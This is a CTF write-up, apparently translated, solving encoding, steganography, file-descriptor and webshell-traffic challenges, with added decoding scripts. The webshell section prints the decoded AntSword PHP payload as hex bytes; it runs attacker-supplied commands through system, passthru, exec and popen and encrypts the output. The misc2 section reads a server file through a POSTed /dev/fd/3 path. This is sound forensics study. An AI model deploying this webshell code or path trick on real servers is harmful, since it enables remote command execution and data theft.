I'm really not cut out for CTFs; I couldn't even make it into the provincial round.

Attachments (odg8)

misc1

We start with a single txt file.


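Garbled text this obvious suggests an encoding-conversion problem. At first I kept guessing it was a UTF-8/GBK conversion; that got nowhere, but it was not entirely fruitless.

When saving the txt with Save As, I noticed its encoding was shown as ASCII, although by default a text file newly created and saved on Windows is UTF-8.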


Open the file in HxD.


Switch the character set from ASCII to EBCDIC and meaningful text appears.


The flag is at the end:

flag{0a07c11e46af753fd24d40023f0fdce1}
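
The same triage done in code instead of by switching HxD's character set, as an added example that is not part of the original write-up: decode the bytes under each candidate encoding and rank the results by how much of the text is printable. The sample bytes are constructed; the challenge file is not reproduced here.

```python
import string

# Encodings the write-up tried or ended up with, plus cp500 (another EBCDIC page).
CANDIDATES = ("ascii", "utf-8", "gbk", "cp037", "cp500")
PRINTABLE = set(string.printable)

def rank_encodings(raw: bytes):
    """Return [(score, encoding, text)], best first; score = printable fraction."""
    ranked = []
    for enc in CANDIDATES:
        try:
            text = raw.decode(enc)      # strict: invalid bytes rule the codec out
        except UnicodeDecodeError:
            continue
        score = sum(ch in PRINTABLE for ch in text) / max(len(text), 1)
        ranked.append((score, enc, text))
    # The sort is stable, so equal scores keep the order of CANDIDATES.
    return sorted(ranked, key=lambda r: r[0], reverse=True)

# Constructed sample: plain text stored as EBCDIC (code page 037).
SAMPLE_TEXT = "constructed sample text: flag{not_the_real_flag}"
SAMPLE = SAMPLE_TEXT.encode("cp037")

if __name__ == "__main__":
    for score, enc, text in rank_encodings(SAMPLE):
        print(f"{score:.2f} {enc:6} {text!r}")
```
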

misc2

A boring challenge.
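From the challenge description I guessed it had to do with /dev/fd.
/dev/fd is a Linux feature; /dev/fd is a symbolic link. If you repeat your ls from different terminals, you will find the links pointing to different ptys. These match the output of the tty command.
In that ls example, I imagine descriptor 3 is the one used to read the file system. Some C functions that produce file descriptors (open(), for example) are guaranteed to return "the lowest-numbered unused file descriptor" (POSIX; note that the low-level open() is not actually part of standard C). So descriptors are recycled after being closed: if you repeatedly open and close different files, you will get 3 as the fd again and again.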

Request /r, then POST data=/dev/fd/3
This returns the flag.
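
The descriptor behaviour described above, as an added example that is not part of the original write-up: a file that is still open stays readable through /dev/fd/N even after its name is deleted, the path disappears once the descriptor is closed, and the next open() gets the same number back. It assumes a system that provides /dev/fd (Linux here); the file content is constructed.

```python
import os
import tempfile

def fd_reuse_demo():
    """Return (bytes read via /dev/fd/N, path gone after close, number reused)."""
    fd, path = tempfile.mkstemp()            # lowest-numbered unused descriptor
    os.write(fd, b"constructed secret\n")
    os.unlink(path)                          # name removed, descriptor still open

    # Any code that reads a caller-supplied path can reach the open file this way.
    with open(f"/dev/fd/{fd}", "rb") as alias:
        alias.seek(0)
        leaked = alias.read()

    os.close(fd)                             # closing promptly removes the alias
    gone = not os.path.exists(f"/dev/fd/{fd}")

    again = os.open(os.devnull, os.O_RDONLY) # the freed number is handed out again
    reused = (again == fd)
    os.close(again)
    return leaked, gone, reused

if __name__ == "__main__":
    print(fd_reuse_demo())
```
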

misc3

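Saved, it is an HTML file. At first I guessed snow steganography, but that decoded nothing. Viewing the source directly shows nothing either.

Press F12 and look at the console; the content is there.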


Edit as HTML

‌​​‌‌​​‌‌​​‌​​‌‌‌​​‌‌‌‌​‌​​‌‌​​​‌​​​​‌​​‌​​‌‌​‌​‌‌​​‌‌​‌‌​​‌‌‌‌​‌‌​​​‌‌​‌​​‌‌‌​​‌‌​​​‌‌‌‌​​‌‌‌​‌‌‌​​‌‌‌​‌‌​​‌‌‌​‌‌​​‌​​​‌‌​​‌​‌​‌​​‌‌​‌​‌‌​​‌​​‌‌‌​​‌​​‌‌​​‌‌‌​​‌​​‌‌​​‌‌‌​​‌‌​‌‌‌​​‌‌‌​‌​​‌‌​​‌‌‌​​​‌‌‌‌‌​​‌​‌​‌‌​​​‌‌​‌‌​​‌‌​​‌​​‌‌‌​‌‌​​‌‌‌​​‌‌​​​‌‌‌‌‌​​‌​‌​‌​​‌‌‌​‌‌​​‌‌​​‌‌‌​​​‌‌​‌‌​​‌‌​​‌‌​​​‌‌​‌​​​​​‌​

Only two distinct characters occur, so I guessed they should be replaced with 0 and 1, or treated as Morse code.

0110011001101100011000010110011101111011011001010011001001100001001110010110001100111000011000100011000100110001001101110011010101100101001101100011011001100011011001100011001000110001011001100011100000110101001110010011001101100010011000110011100000110101011000100110011000111001001100110011100101111101

Converting the 0/1 string to text decodes it successfully.


flag{e2a9c8b1175e66cf21f8593bc85bf939}
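
The two-symbol decoding above, as an added example that is not part of the original write-up: pull the invisible characters out of the markup, try both symbol-to-bit assignments and keep the one that yields printable ASCII. The HTML sample and its hidden string are constructed, and the set of code points checked is an assumption about which zero-width characters to look for.

```python
# Invisible code points commonly usable as carriers (assumed list).
ZERO_WIDTH = {"\u200b", "\u200c", "\u200d", "\u2060", "\ufeff"}

def extract_zero_width(text: str) -> str:
    """Keep only the invisible characters, in document order."""
    return "".join(ch for ch in text if ch in ZERO_WIDTH)

def decode_two_symbols(hidden: str) -> str:
    """Decode a two-symbol carrier as 8-bit ASCII without knowing which is 0."""
    symbols = sorted(set(hidden))
    if len(symbols) != 2:
        raise ValueError(f"expected 2 distinct symbols, found {len(symbols)}")
    best = (-1, b"")
    for zero in symbols:                          # try both assignments
        bits = "".join("0" if ch == zero else "1" for ch in hidden)
        bits = bits[: len(bits) - len(bits) % 8]  # drop an incomplete last byte
        data = bytes(int(bits[i:i + 8], 2) for i in range(0, len(bits), 8))
        printable = sum(0x20 <= b < 0x7F for b in data)
        best = max(best, (printable, data))
    return best[1].decode("ascii", errors="replace")

# Constructed sample: a visible sentence with a hidden string between two words.
SAMPLE_SECRET = "flag{constructed_example}"
SAMPLE_BITS = "".join(f"{b:08b}" for b in SAMPLE_SECRET.encode("ascii"))
SAMPLE_HTML = ("<p>Nothing to see"
               + SAMPLE_BITS.replace("0", "\u200c").replace("1", "\u200b")
               + " here.</p>")

if __name__ == "__main__":
    hidden = extract_zero_width(SAMPLE_HTML)
    print(len(hidden), "invisible characters ->", decode_two_symbols(hidden))
```
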

webshell

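AntSword traffic analysis

Export all HTTP objects into a folder and look at the last few.

This capture uses the Chr16 mode, which means each (0x??) in the parentheses is converted to ASCII. Converting by hand can be a bit problematic, though: a stretch of garbage ends up at the tail.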


Extract it with a script.

a=[0x40,0x69,0x6e,0x69,0x5f,0x73,0x65,0x74,0x28,0x22,0x64,0x69,0x73,0x70,0x6c,0x61,0x79,0x5f,0x65,0x72,0x72,0x6f,0x72,0x73,0x22,0x2c,0x20,0x22,0x30,0x22,0x29,0x3b,0x40,0x73,0x65,0x74,0x5f,0x74,0x69,0x6d,0x65,0x5f,0x6c,0x69,0x6d,0x69,0x74,0x28,0x30,0x29,0x3b,0x66,0x75,0x6e,0x63,0x74,0x69,0x6f,0x6e,0x20,0x61,0x73,0x65,0x6e,0x63,0x28,0x24,0x6f,0x75,0x74,0x29,0x7b,0x40,0x73,0x65,0x73,0x73,0x69,0x6f,0x6e,0x5f,0x73,0x74,0x61,0x72,0x74,0x28,0x29,0x3b,0x24,0x6b,0x65,0x79,0x3d,0x27,0x66,0x35,0x30,0x34,0x35,0x62,0x30,0x35,0x61,0x62,0x65,0x36,0x65,0x63,0x39,0x62,0x31,0x65,0x33,0x37,0x66,0x61,0x66,0x61,0x38,0x35,0x31,0x66,0x35,0x64,0x65,0x39,0x27,0x3b,0x72,0x65,0x74,0x75,0x72,0x6e,0x20,0x40,0x62,0x61,0x73,0x65,0x36,0x34,0x5f,0x65,0x6e,0x63,0x6f,0x64,0x65,0x28,0x6f,0x70,0x65,0x6e,0x73,0x73,0x6c,0x5f,0x65,0x6e,0x63,0x72,0x79,0x70,0x74,0x28,0x62,0x61,0x73,0x65,0x36,0x34,0x5f,0x65,0x6e,0x63,0x6f,0x64,0x65,0x28,0x24,0x6f,0x75,0x74,0x29,0x2c,0x20,0x27,0x41,0x45,0x53,0x2d,0x31,0x32,0x38,0x2d,0x45,0x43,0x42,0x27,0x2c,0x20,0x24,0x6b,0x65,0x79,0x2c,0x20,0x4f,0x50,0x45,0x4e,0x53,0x53,0x4c,0x5f,0x52,0x41,0x57,0x5f,0x44,0x41,0x54,0x41,0x29,0x29,0x3b,0x7d,0x3b,0x3b,0x66,0x75,0x6e,0x63,0x74,0x69,0x6f,0x6e,0x20,0x61,0x73,0x6f,0x75,0x74,0x70,0x75,0x74,0x28,0x29,0x7b,0x24,0x6f,0x75,0x74,0x70,0x75,0x74,0x3d,0x6f,0x62,0x5f,0x67,0x65,0x74,0x5f,0x63,0x6f,0x6e,0x74,0x65,0x6e,0x74,0x73,0x28,0x29,0x3b,0x6f,0x62,0x5f,0x65,0x6e,0x64,0x5f,0x63,0x6c,0x65,0x61,0x6e,0x28,0x29,0x3b,0x65,0x63,0x68,0x6f,0x20,0x22,0x38,0x63,0x32,0x62,0x34,0x22,0x3b,0x65,0x63,0x68,0x6f,0x20,0x40,0x61,0x73,0x65,0x6e,0x63,0x28,0x24,0x6f,0x75,0x74,0x70,0x75,0x74,0x29,0x3b,0x65,0x63,0x68,0x6f,0x20,0x22,0x65,0x32,0x65,0x31,0x30,0x22,0x3b,0x7d,0x6f,0x62,0x5f,0x73,0x74,0x61,0x72,0x74,0x28,0x29,0x3b,0x74,0x72,0x79,0x7b,0x24,0x70,0x3d,0x62,0x61,0x73,0x65,0x36,0x34,0x5f,0x64,0x65,0x63,0x6f,0x64,0x65,0x28,0x24,0x5f,0x50,0x4f,0x53,0x54,0x5b,0x22,0x30,0x78,0x31,0x62,0x34,0x64,0x34,0x35,0x36,0x63,0x37,0x32,0x39,0x37,0x64,0x22,0x5d,0x29,0x3b,0x24,
0x73,0x3d,0x62,0x61,0x73,0x65,0x36,0x34,0x5f,0x64,0x65,0x63,0x6f,0x64,0x65,0x28,0x24,0x5f,0x50,0x4f,0x53,0x54,0x5b,0x22,0x30,0x78,0x62,0x39,0x62,0x34,0x35,0x36,0x38,0x38,0x61,0x35,0x61,0x30,0x38,0x22,0x5d,0x29,0x3b,0x24,0x64,0x3d,0x64,0x69,0x72,0x6e,0x61,0x6d,0x65,0x28,0x24,0x5f,0x53,0x45,0x52,0x56,0x45,0x52,0x5b,0x22,0x53,0x43,0x52,0x49,0x50,0x54,0x5f,0x46,0x49,0x4c,0x45,0x4e,0x41,0x4d,0x45,0x22,0x5d,0x29,0x3b,0x24,0x63,0x3d,0x73,0x75,0x62,0x73,0x74,0x72,0x28,0x24,0x64,0x2c,0x30,0x2c,0x31,0x29,0x3d,0x3d,0x22,0x2f,0x22,0x3f,0x22,0x2d,0x63,0x20,0x5c,0x22,0x7b,0x24,0x73,0x7d,0x5c,0x22,0x22,0x3a,0x22,0x2f,0x63,0x20,0x5c,0x22,0x7b,0x24,0x73,0x7d,0x5c,0x22,0x22,0x3b,0x24,0x72,0x3d,0x22,0x7b,0x24,0x70,0x7d,0x20,0x7b,0x24,0x63,0x7d,0x22,0x3b,0x66,0x75,0x6e,0x63,0x74,0x69,0x6f,0x6e,0x20,0x66,0x65,0x28,0x24,0x66,0x29,0x7b,0x24,0x64,0x3d,0x65,0x78,0x70,0x6c,0x6f,0x64,0x65,0x28,0x22,0x2c,0x22,0x2c,0x40,0x69,0x6e,0x69,0x5f,0x67,0x65,0x74,0x28,0x22,0x64,0x69,0x73,0x61,0x62,0x6c,0x65,0x5f,0x66,0x75,0x6e,0x63,0x74,0x69,0x6f,0x6e,0x73,0x22,0x29,0x29,0x3b,0x69,0x66,0x28,0x65,0x6d,0x70,0x74,0x79,0x28,0x24,0x64,0x29,0x29,0x7b,0x24,0x64,0x3d,0x61,0x72,0x72,0x61,0x79,0x28,0x29,0x3b,0x7d,0x65,0x6c,0x73,0x65,0x7b,0x24,0x64,0x3d,0x61,0x72,0x72,0x61,0x79,0x5f,0x6d,0x61,0x70,0x28,0x27,0x74,0x72,0x69,0x6d,0x27,0x2c,0x61,0x72,0x72,0x61,0x79,0x5f,0x6d,0x61,0x70,0x28,0x27,0x73,0x74,0x72,0x74,0x6f,0x6c,0x6f,0x77,0x65,0x72,0x27,0x2c,0x24,0x64,0x29,0x29,0x3b,0x7d,0x72,0x65,0x74,0x75,0x72,0x6e,0x28,0x66,0x75,0x6e,0x63,0x74,0x69,0x6f,0x6e,0x5f,0x65,0x78,0x69,0x73,0x74,0x73,0x28,0x24,0x66,0x29,0x26,0x26,0x69,0x73,0x5f,0x63,0x61,0x6c,0x6c,0x61,0x62,0x6c,0x65,0x28,0x24,0x66,0x29,0x26,0x26,0x21,0x69,0x6e,0x5f,0x61,0x72,0x72,0x61,0x79,0x28,0x24,0x66,0x2c,0x24,0x64,0x29,0x29,0x3b,0x7d,0x3b,0x66,0x75,0x6e,0x63,0x74,0x69,0x6f,0x6e,0x20,0x72,0x75,0x6e,0x63,0x6d,0x64,0x28,0x24,0x63,0x29,0x7b,0x24,0x72,0x65,0x74,0x3d,0x30,0x3b,0x69,0x66,0x28,0x66,0x65,0x28,0x27,0x73,0x79,0x73,0x74,0x65,0x6d,0x27,0x29,0x29,0x7b,
0x40,0x73,0x79,0x73,0x74,0x65,0x6d,0x28,0x24,0x63,0x2c,0x24,0x72,0x65,0x74,0x29,0x3b,0x7d,0x65,0x6c,0x73,0x65,0x69,0x66,0x28,0x66,0x65,0x28,0x27,0x70,0x61,0x73,0x73,0x74,0x68,0x72,0x75,0x27,0x29,0x29,0x7b,0x40,0x70,0x61,0x73,0x73,0x74,0x68,0x72,0x75,0x28,0x24,0x63,0x2c,0x24,0x72,0x65,0x74,0x29,0x3b,0x7d,0x65,0x6c,0x73,0x65,0x69,0x66,0x28,0x66,0x65,0x28,0x27,0x73,0x68,0x65,0x6c,0x6c,0x5f,0x65,0x78,0x65,0x63,0x27,0x29,0x29,0x7b,0x70,0x72,0x69,0x6e,0x74,0x28,0x40,0x73,0x68,0x65,0x6c,0x6c,0x5f,0x65,0x78,0x65,0x63,0x28,0x24,0x63,0x29,0x29,0x3b,0x7d,0x65,0x6c,0x73,0x65,0x69,0x66,0x28,0x66,0x65,0x28,0x27,0x65,0x78,0x65,0x63,0x27,0x29,0x29,0x7b,0x40,0x65,0x78,0x65,0x63,0x28,0x24,0x63,0x2c,0x24,0x6f,0x2c,0x24,0x72,0x65,0x74,0x29,0x3b,0x70,0x72,0x69,0x6e,0x74,0x28,0x6a,0x6f,0x69,0x6e,0x28,0x22,0xa,0x22,0x2c,0x24,0x6f,0x29,0x29,0x3b,0x7d,0x65,0x6c,0x73,0x65,0x69,0x66,0x28,0x66,0x65,0x28,0x27,0x70,0x6f,0x70,0x65,0x6e,0x27,0x29,0x29,0x7b,0x24,0x66,0x70,0x3d,0x40,0x70,0x6f,0x70,0x65,0x6e,0x28,0x24,0x63,0x2c,0x27,0x72,0x27,0x29,0x3b,0x77,0x68,0x69,0x6c,0x65,0x28,0x21,0x40,0x66,0x65,0x6f,0x66,0x28,0x24,0x66,0x70,0x29,0x29,0x7b,0x70,0x72,0x69,0x6e,0x74,0x28,0x40,0x66,0x67,0x65,0x74,0x73,0x28,0x24,0x66,0x70,0x2c,0x20,0x32,0x30,0x34,0x38,0x29,0x29,0x3b,0x7d,0x40,0x70,0x63,0x6c,0x6f,0x73,0x65,0x28,0x24,0x66,0x70,0x29,0x3b,0x7d,0x65,0x6c,0x73,0x65,0x69,0x66,0x28,0x66,0x65,0x28,0x27,0x61,0x6e,0x74,0x73,0x79,0x73,0x74,0x65,0x6d,0x27,0x29,0x29,0x7b,0x40,0x61,0x6e,0x74,0x73,0x79,0x73,0x74,0x65,0x6d,0x28,0x24,0x63,0x29,0x3b,0x7d,0x65,0x6c,0x73,0x65,0x7b,0x24,0x72,0x65,0x74,0x20,0x3d,0x20,0x31,0x32,0x37,0x3b,0x7d,0x72,0x65,0x74,0x75,0x72,0x6e,0x20,0x24,0x72,0x65,0x74,0x3b,0x7d,0x3b,0x24,0x72,0x65,0x74,0x3d,0x40,0x72,0x75,0x6e,0x63,0x6d,0x64,0x28,0x24,0x72,0x2e,0x22,0x20,0x32,0x3e,0x26,0x31,0x22,0x29,0x3b,0x70,0x72,0x69,0x6e,0x74,0x20,0x28,0x24,0x72,0x65,0x74,0x21,0x3d,0x30,0x29,0x3f,0x22,0x72,0x65,0x74,0x3d,0x7b,0x24,0x72,0x65,0x74,0x7d,0x22,0x3a,0x22,0x22,0x3b,0x3b,0x7d,0x63,0x61,0x74,0x63,
0x68,0x28,0x45,0x78,0x63,0x65,0x70,0x74,0x69,0x6f,0x6e,0x20,0x24,0x65,0x29,0x7b,0x65,0x63,0x68,0x6f,0x20,0x22,0x45,0x52,0x52,0x4f,0x52,0x3a,0x2f,0x2f,0x22,0x2e,0x24,0x65,0x2d,0x3e,0x67,0x65,0x74,0x4d,0x65,0x73,0x73,0x61,0x67,0x65,0x28,0x29,0x3b,0x7d,0x3b,0x61,0x73,0x6f,0x75,0x74,0x70,0x75,0x74,0x28,0x29,0x3b,0x64,0x69,0x65,0x28,0x29,0x3b]  # Replace the contents with your own; I forgot which stream this content came from
b=''
for i in a:
    #print(chr(i))
    b+=chr(i)
print(b)

The converted result looks like this:


shell14 is the content that needs chr decoding, and shell15 is the AES-encrypted content; the AES key is already given in shell14.


$key='f5045b05abe6ec9b1e37fafa851f5de9'
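
Hand conversion and the tail garbage mentioned earlier can be avoided by matching only the (0x??) tokens, as in this added example (not part of the original write-up). It also pulls the key, cipher name and the two echo markers out of the decoded source so the response body can be cut cleanly. The request shape `chr(0x..)` joined with `.`, the parameter names and every sample value are assumptions constructed for the example.

```python
import re
from urllib.parse import unquote_plus

# Matches one chr(0x??) call regardless of letter case (assumed request shape).
CHR16 = re.compile(r"chr\(\s*0x([0-9a-f]{1,2})\s*\)", re.IGNORECASE)

def decode_chr16(body: str) -> str:
    """Rebuild the PHP source from a form body; only matched tokens are used,
    so bytes that are not chr(0x??) calls never reach the output."""
    codes = CHR16.findall(unquote_plus(body))
    return bytes(int(c, 16) for c in codes).decode("latin-1")

def triage(php: str) -> dict:
    """Collect what is needed to read the matching response."""
    key = re.search(r"\$key='([^']+)'", php)
    cipher = re.search(r"openssl_encrypt\([^;]*?'([A-Za-z0-9-]+)'", php)
    marks = re.findall(r'echo "([0-9a-f]+)";', php)
    return {
        "key": key.group(1) if key else None,
        # PHP's openssl_* silently truncates an over-long key; AES-128 uses 16 bytes.
        "key_used": key.group(1)[:16] if key else None,
        "cipher": cipher.group(1) if cipher else None,
        "markers": tuple(marks[:2]),
    }

def cut_ciphertext(response: str, markers) -> str:
    """Return the base64 text between the prefix and suffix markers."""
    start, end = markers
    return response.split(start, 1)[1].rsplit(end, 1)[0]

# Constructed sample shaped like the decoded payload above (all values made up).
SAMPLE_SRC = ("$key='00112233445566778899aabbccddeeff';"
              "return @base64_encode(openssl_encrypt(base64_encode($out), "
              "'AES-128-ECB', $key, OPENSSL_RAW_DATA));"
              'echo "1a2b3";echo @asenc($output);echo "4c5d6";')
SAMPLE_BODY = "shell=" + ".".join(f"cHr(0x{ord(ch):x})" for ch in SAMPLE_SRC) + "&junk=%00%ff"
SAMPLE_RESPONSE = "1a2b3Q09OU1RSVUNURUQ=4c5d6"

if __name__ == "__main__":
    info = triage(decode_chr16(SAMPLE_BODY))
    print(info)
    print(cut_ciphertext(SAMPLE_RESPONSE, info["markers"]))
```
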

Decrypt with openssl, which ships with Kali, by writing a small decryption script in PHP:

<?php
$key='f5045b05abe6ec9b1e37fafa851f5de9';
$d = "kRD1eD+vSZ81FAJ6XClabCR0xNFklup5/x+gixas3l0kdMTRZJbqef8foIsWrN5dJHTE0WSW6nn/H6CLFqzeXSR0xNFklup5/x+gixas3l0kdMTRZJbqef8foIsWrN5dZOTFg4DW9MYwG6k3rEvAAR8oFStGnfMRtUJOqc0mgokfKBUrRp3zEbVCTqnNJoKJHygVK0ad8xG1Qk6pzSaCiR8oFStGnfMRtUJOqc0mgokfKBUrRp3zEbVCTqnNJoKJ1qI47Cz1/qfnNoNARGhLfVhC0RJlfeKCvbPwpjFn//BSFY8RJlZyxz1a+TPy0D3cUhWPESZWcsc9Wvkz8tA93FIVjxEmVnLHPVr5M/LQPdxSFY8RJlZyxz1a+TPy0D3cUhWPESZWcsc9Wvkz8tA93GnMvJfVbvphfWnt17IOkzYjvv91k2fnYDR7u4nlGM3YitxGYGs9mn+HS5iJBXORtYrcRmBrPZp/h0uYiQVzkbWK3EZgaz2af4dLmIkFc5G1itxGYGs9mn+HS5iJBXORtUq4dBjDRFhDqDyzs9CScJhrd3yMusQ+qsnZkq4Ey7NVJHTE0WSW6nn/H6CLFqzeXSR0xNFklup5/x+gixas3l0kdMTRZJbqef8foIsWrN5dJHTE0WSW6nn/H6CLFqzeXSR0xNFklup5/x+gixas3l2hDPuDhVN4TaDLzp9bXyfGeCVhvglAaNo2rA/ovnRTTtfA5ZywMOOijj6md5RItqjXwOWcsDDjoo4+pneUSLao18DlnLAw46KOPqZ3lEi2qNfA5ZywMOOijj6md5RItqgS0b9hS7r5TX9YNZo2awgUAyqVacVgwr1NlNQ2k/kihhh0QQfnjeGdZhkz0N0jAKiMzFmAMa7xQ1URxTaHoHjDg3NaWl/8+PVG+pyaKrbNDjfl77POeQE8+0MCHpz6YxWLJ6mwCe1X3uzz/HSHcHSvQBB8FxjOhugOErOXkd3LZi/60Gr4gIEc1JIxA5A2pE/V6Z/DFwNOR4M/IIIWdGr5";
$m = openssl_decrypt(base64_decode($d) , 'AES-128-ECB', $key, OPENSSL_RAW_DATA);
echo base64_decode($m);
?>

This decrypts the AES content:


It looks like base64, so decode it.


flag{AntSword_is_Powerful_3222222!!!!}

twocats

Try XOR first.


This shows that the two images have differing pixels; since it is not XOR, try a blind watermark.

Extract the image.


flag{BlindWaterMark1234}
#The challenge author really saved themselves some effort